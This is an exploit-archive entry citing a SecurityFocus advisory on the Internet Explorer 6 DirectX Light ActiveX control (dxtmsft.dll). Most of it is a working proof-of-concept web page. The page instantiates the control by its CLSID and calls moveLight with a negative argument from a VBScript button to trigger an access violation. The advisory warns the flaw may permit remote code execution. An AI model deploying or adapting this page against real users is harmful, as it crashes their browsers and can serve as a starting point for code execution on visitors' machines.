33 lines
No EOL
883 B
Text
33 lines
No EOL
883 B
Text
source: https://www.securityfocus.com/bid/18303/info
|
|
|
|
The DXImageTransform.Microsoft.Light ActiveX control is prone to remote code execution.
|
|
|
|
An attacker could exploit this issue to execute code in the context of the user visiting a malicious web page.
|
|
|
|
<!--
|
|
MS Internet Explorer 6 DirectX Media DoS Vulnerability
|
|
DLL: dxtmsft.dll
|
|
|
|
Discovered & Coded by: r0ut3r (writ3r [at] gmail.com)
|
|
|
|
Description:
|
|
Sub moveLight (
|
|
ByVal lightNum As Long ,
|
|
ByVal x As Long ,
|
|
ByVal y As Long ,
|
|
ByVal z As Long ,
|
|
ByVal fAbsolute As Long
|
|
)
|
|
Supplying negative parameters throws an access violation.
|
|
-->
|
|
|
|
<object classid="clsid:F9EFBEC2-4302-11D2-952A-00C04FA34F05" id="DXTLight">
|
|
Unable to create object
|
|
</object>
|
|
|
|
<script language="vbscript">
|
|
Sub go
|
|
DXTLight.moveLight "-1", "1", "1", "1", "1"
|
|
End Sub
|
|
</script>
|
|
<input language=VBScript type="button" value="Try me" onclick="go()"> |